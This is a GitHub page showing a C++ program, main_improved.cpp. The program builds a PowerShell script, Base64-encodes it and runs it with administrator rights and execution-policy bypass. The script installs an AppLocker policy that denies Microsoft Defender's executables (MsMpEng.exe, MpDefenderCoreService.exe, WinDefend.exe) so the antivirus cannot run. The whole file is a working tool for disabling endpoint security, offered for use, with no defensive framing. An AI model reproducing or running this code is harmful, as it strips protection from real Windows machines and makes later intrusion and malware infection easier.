-
Notifications
You must be signed in to change notification settings - Fork 46
Expand file tree
/
Copy pathmain_improved.cpp
More file actions
253 lines (186 loc) · 6.81 KB
/
main_improved.cpp
File metadata and controls
253 lines (186 loc) · 6.81 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
#include <Windows.h>
#include <iostream>
#include <string>
#define RED "\x1b[31m"
#define GREEN "\x1b[32m"
#define CYAN "\x1b[36m"
#define YELLOW "\x1b[33m"
#define RESET "\x1b[0m"
// Can be extended
const wchar_t* targetNames[] =
{
L"MpDefenderCoreService.exe",
L"MsMpEng.exe",
L"WinDefend.exe"
};
const size_t targetCount = sizeof(targetNames) / sizeof(targetNames[0]);
const wchar_t* g_PowerShellBody = LR"(
# Only use if the service AppIDSvc and AppID is not enabled
# sc.exe config AppID start=system
# sc.exe config AppIDSvc start=auto
# sc.exe start AppIDSvc
# No validation needed for wildcard paths like '*\MsMpEng.exe'
# Create unique GUIDs for static rules
$guidAllowExeSigned = [guid]::NewGuid().ToString()
$guidAllowExeAllPath = [guid]::NewGuid().ToString()
$guidAllowMsiSigned = [guid]::NewGuid().ToString()
$guidAllowMsiAllPath = [guid]::NewGuid().ToString()
$guidAllowScript = [guid]::NewGuid().ToString()
$guidAllowAppx = [guid]::NewGuid().ToString()
# Build dynamic block rules
$dynamicBlockRules = ''
foreach ($exe in $ExeToBlock) {
$id = [guid]::NewGuid().ToString()
$name = Split-Path $exe -Leaf
$dynamicBlockRules += '<FilePathRule Id="' + $id + '" Name="Block ' + $name + '" Description="Blocked by policy" UserOrGroupSid="S-1-5-18" Action="Deny">'
$dynamicBlockRules += '<Conditions><FilePathCondition Path="' + $exe + '" /></Conditions>'
$dynamicBlockRules += '</FilePathRule>'
}
$xml = @"
<AppLockerPolicy Version="1">
<RuleCollection Type="Appx" EnforcementMode="NotConfigured">
<FilePublisherRule Id="$guidAllowAppx" Name="Allow All Appx" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
<Conditions>
<FilePublisherCondition PublisherName="*" ProductName="*" BinaryName="*">
<BinaryVersionRange LowSection="0.0.0.0" HighSection="*" />
</FilePublisherCondition>
</Conditions>
</FilePublisherRule>
</RuleCollection>
<RuleCollection Type="Dll" EnforcementMode="NotConfigured" />
<RuleCollection Type="Exe" EnforcementMode="Enabled">
<FilePublisherRule Id="$guidAllowExeSigned" Name="Allow All Signed EXEs" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
<Conditions>
<FilePublisherCondition PublisherName="*" ProductName="*" BinaryName="*">
<BinaryVersionRange LowSection="*" HighSection="*" />
</FilePublisherCondition>
</Conditions>
</FilePublisherRule>
$dynamicBlockRules
<FilePathRule Id="$guidAllowExeAllPath" Name="Allow All Other EXEs" Description="Fallback allow" UserOrGroupSid="S-1-1-0" Action="Allow">
<Conditions>
<FilePathCondition Path="*" />
</Conditions>
</FilePathRule>
<RuleCollectionExtensions>
<ThresholdExtensions><Services EnforcementMode="Enabled" /></ThresholdExtensions>
<RedstoneExtensions><SystemApps Allow="Enabled" /></RedstoneExtensions>
</RuleCollectionExtensions>
</RuleCollection>
<RuleCollection Type="Msi" EnforcementMode="NotConfigured">
<FilePublisherRule Id="$guidAllowMsiSigned" Name="Allow All Signed MSIs" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
<Conditions>
<FilePublisherCondition PublisherName="*" ProductName="*" BinaryName="*">
<BinaryVersionRange LowSection="*" HighSection="*" />
</FilePublisherCondition>
</Conditions>
</FilePublisherRule>
<FilePathRule Id="$guidAllowMsiAllPath" Name="Allow All MSI Paths" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
<Conditions>
<FilePathCondition Path="*" />
</Conditions>
</FilePathRule>
</RuleCollection>
<RuleCollection Type="Script" EnforcementMode="NotConfigured">
<FilePathRule Id="$guidAllowScript" Name="Allow All Scripts" Description="OK" UserOrGroupSid="S-1-1-0" Action="Allow">
<Conditions>
<FilePathCondition Path="*" />
</Conditions>
</FilePathRule>
</RuleCollection>
</AppLockerPolicy>
"@
$tempPath = [System.IO.Path]::GetTempFileName()
Set-Content -Path $tempPath -Value $xml -Encoding UTF8
Write-Host '[*] Applying AppLocker policy...'
Set-AppLockerPolicy -XmlPolicy $tempPath -ErrorAction Stop
Remove-Item $tempPath -Force
gpupdate /force | Out-Null
Write-Host '[+] AppLocker policy applied. Blocked EXEs:' -ForegroundColor Green
$ExeToBlock | ForEach-Object { Write-Host (' -> ' + $_) -ForegroundColor Green }
Read-Host "Press ENTER to exit"
)";
std::wstring BuildPowerShellExeArray()
{
if (targetCount == 0)
return L"@()";
std::wstring result = L"@(";
for (size_t i = 0; i < targetCount; ++i)
{
result += L"\"*\\";
result += targetNames[i];
result += L"\"";
if (i + 1 < targetCount)
result += L",";
}
result += L")";
return result;
}
std::wstring BuildFullPowerShellScript()
{
std::wstring script;
std::wstring arrayExpr = BuildPowerShellExeArray();
script += L"$ExeToBlock = ";
script += arrayExpr;
script += L"\n";
script += g_PowerShellBody;
return script;
}
std::wstring Base64Encode(const BYTE* data, size_t len)
{
static const wchar_t* base64_chars =
L"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
std::wstring result;
result.reserve((len + 2) / 3 * 4);
for (size_t i = 0; i < len; i += 3)
{
unsigned char b1 = data[i];
unsigned char b2 = (i + 1 < len) ? data[i + 1] : 0;
unsigned char b3 = (i + 2 < len) ? data[i + 2] : 0;
unsigned int triple = (b1 << 16) | (b2 << 8) | b3;
result.push_back(base64_chars[(triple >> 18) & 0x3F]);
result.push_back(base64_chars[(triple >> 12) & 0x3F]);
if (i + 1 < len)
result.push_back(base64_chars[(triple >> 6) & 0x3F]);
else
result.push_back(L'=');
if (i + 2 < len)
result.push_back(base64_chars[triple & 0x3F]);
else
result.push_back(L'=');
}
return result;
}
void RunPowerShellInMemory()
{
std::wstring script = BuildFullPowerShellScript();
// UTF-16LE → Bytes
const BYTE* bytes = reinterpret_cast<const BYTE*>(script.c_str());
size_t byteLen = script.size() * sizeof(wchar_t);
std::wstring encoded = Base64Encode(bytes, byteLen);
std::wstring params = L"-NoProfile -ExecutionPolicy Bypass -EncodedCommand ";
params += encoded;
ShellExecuteW(
NULL,
L"runas", // Admin
L"powershell.exe",
params.c_str(),
NULL,
SW_SHOW
);
}
int main()
{
std::wstring psArg = BuildPowerShellExeArray();
if (psArg != L"@()")
{
wprintf(L"\n" CYAN L"[+] PowerShell Input: " RESET L"%ws\n", psArg.c_str());
RunPowerShellInMemory();
}
else
{
printf(RED "[-] No target executables defined.\n" RESET);
}
getchar();
return 0;
}